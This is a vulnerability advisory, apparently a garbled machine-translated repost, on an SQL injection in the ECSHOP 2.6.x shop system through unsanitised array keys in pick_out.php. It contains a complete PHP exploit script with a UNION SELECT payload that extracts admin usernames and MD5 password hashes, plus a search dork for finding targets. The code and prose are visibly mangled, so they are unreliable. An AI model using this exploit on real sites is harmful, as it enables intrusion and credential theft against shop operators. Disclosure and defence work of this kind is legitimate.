Affected Versions:
ECSHOP 2.6.1/2.6.2
Program introduction:
ECSHOP is an open-source free online shop system. Upgraded and maintained by a professional development team to provide you with timely and efficient technical support. You can also customize ECSHOP based on your business characteristics to add special features of your mall.
Vulnerability Analysis:
The file des/init. php judges get_magic_quotes_gpc (). If it is off, addslashes_deep () is called ():
// Des/init. php
If (! Get_magic_quotes_gpc ())
{
If (! Emptyempty ($ _ GET ))
{
$ _ GET = addslashes_deep ($ _ GET );
}
If (! Emptyempty ($ _ POST ))
{
$ _ POST = addslashes_deep ($ _ POST );
}
$ _ COOKIE = addslashes_deep ($ _ COOKIE );
$ _ REQUEST = addslashes_deep ($ _ REQUEST );
}
Addslashes_deep () is finally processed by addslashes () in the file uplodes/lib_base.php.
// Includes/lib_base.php
Function addslashes_deep ($ value)
{
If (emptyempty ($ value ))
{
Return $ value;
}
Else
{
Return is_array ($ value )? Array_map (addslashes_deep, $ value): addslashes ($ value );
// Only the array value is processed :)
}
}
The code that causes the vulnerability is as follows:
// Pick_out.php
If (! Emptyempty ($ _ GET [attr])
{
Foreach ($ _ GET [attr] as $ key => $ value)
{
$ Key = intval ($ key );
$ _ GET [attr] [$ key] = htmlspecialchars ($ value );
// Foreach processes the copy of the specified array, so the processing here does not affect the original key and value of the array.
// Therefore, any key can be introduced :)
// Is there a problem with the programmer's logic?
}
}
...
Foreach ($ _ GET [attr] AS $ key => $ value)
{
$ Attr_url. = & attr [. $ key.] =. $ value;
$ Attr_picks [] = $ key;
If ($ I> 0)
{
If (emptyempty ($ goods_result ))
{
Break;
}
// Inject with key :)
$ Goods_result = $ db-> getCol ("SELECT goods_id FROM ". $ ecs-> table ("goods_attr "). "WHERE goods_id IN (". implode (, $ goods_result ). ") AND attr_id = $ key AND attr_value = $ value ");
The injection vulnerability is caused because $ key is not processed when magic_quotes_gpc = off, and a logic problem exists during array assignment.
Vulnerability exploitation:
#! /Usr/bin/php
<? Php
// This program is only for technical exchange. Please do not use it for illegal purposes !!
Print_r (
+ --------------------------------------------------------------------------- +
ECShop <= v2.6.2 SQL injection/admin credentials disclosure exploit
By puret_t
Mail: puretot at gmail dot com
Team: http://bbs.wolvez.org
Dork: "Powered by ECShop"
+ --------------------------------------------------------------------------- +
);
/**
* Works with magic_quotes_gpc = Off
*/
If ($ argc <3 ){
Print_r (
+ --------------------------------------------------------------------------- +
Usage: php. $ argv [0]. host path
Host: target server (ip/hostname)
Path: path to ecshop
Example:
Php. $ argv [0]. localhost/ecshop/
+ --------------------------------------------------------------------------- +
);
Exit;
}
Error_reporting (7 );
Ini_set (max_execution_time, 0 );
$ Host = $ argv [1];
$ Path = $ argv [2];
$ Resp = send ();
Preg_match (# INs ([S] +) :( [a-z0-9] {32}) #, $ resp, $ hash );
If ($ hash)
Exit ("Expoilt Success! Admin: $ hash [1] Password (md5): $ hash [2] ");
Else
Exit ("Exploit Failed! ");
Function send ()
{
Global $ host, $ path;
$ Cmd = cat_id = 999999 & attr [% 27% 20 UNION % 20 SELECT % 20 CONCAT (user_name % 2c0x3a % 2 cpassword) % 20as % 20goods_id % 20 FROM % 20ecs_admin_user % 20 WHERE % 20action_list % 3d % 27all % 27% 20 LIMIT % 201% 23] = ryat;
$ Data = "GET". $ path. "pick_out.php? ". $ Cmd." HTTP/1.1 ";
$ Data. = "Host: $ host ";
$ Data. = "Connection: Close ";
$ Fp = fsockopen ($ host, 80 );
Fputs ($ fp, $ data );
$ Resp =;
While ($ fp &&! Feof ($ fp ))
$ Resp. = fread ($ fp, 1024 );
Return $ resp;
}
?>
Solution:
Vendor patch
ECSHOP
----------
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:
Http://www.ecshop.com
Information Source:
<* Source: ryat # www.wolvez.org
Link: http://www.80vul.com
*>
This article from: cool kids blog http://www.cnredhat.com /? Action = show & id = 191